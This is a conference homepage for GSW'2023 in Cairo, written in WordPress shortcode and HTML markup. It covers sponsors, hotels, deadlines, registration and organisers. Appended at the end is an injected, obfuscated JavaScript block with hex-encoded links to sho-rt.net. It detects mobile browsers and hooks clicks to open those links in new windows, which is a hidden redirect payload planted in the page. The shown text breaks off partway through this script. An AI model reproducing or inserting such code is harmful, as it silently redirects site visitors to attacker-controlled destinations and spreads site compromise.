src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791077250{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"100\" height=\"99\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 